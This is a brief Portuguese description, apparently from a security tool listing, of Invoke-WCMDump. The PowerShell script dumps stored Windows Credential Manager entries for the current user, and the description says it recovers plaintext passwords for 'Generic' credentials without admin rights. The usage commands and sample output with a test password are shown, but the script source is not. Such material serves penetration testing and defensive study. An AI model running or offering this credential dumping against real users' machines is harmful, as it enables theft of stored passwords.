
Script PowerShell para Despejar Credenciais do Windows do Gerenciador de Credenciais
Script PowerShell para extrair credenciais do Windows do Gerenciador de Credenciais
Invoke-WCMDump enumera credenciais do Windows no Gerenciador de Credenciais e depois extrai informações disponíveis sobre cada uma. Senhas são recuperadas para credenciais do tipo "Generic", mas não podem ser recuperadas pelo mesmo método para credenciais do tipo "Domain". Credenciais são retornadas apenas para o usuário atual.
Não requer privilégios de administrador!
Autor: Barrett Adams (@peewpw)
PS>Import-Module .\Invoke-WCMDump.ps1
PS>Invoke-WCMDump
Username : testusername
Password : P@ssw0rd!
Target : TestApplication
Description :
LastWriteTime : 12/9/2017 4:46:50 PM
LastWriteTimeUtc : 12/9/2017 9:46:50 PM
Type : Generic
PersistenceType : Enterprise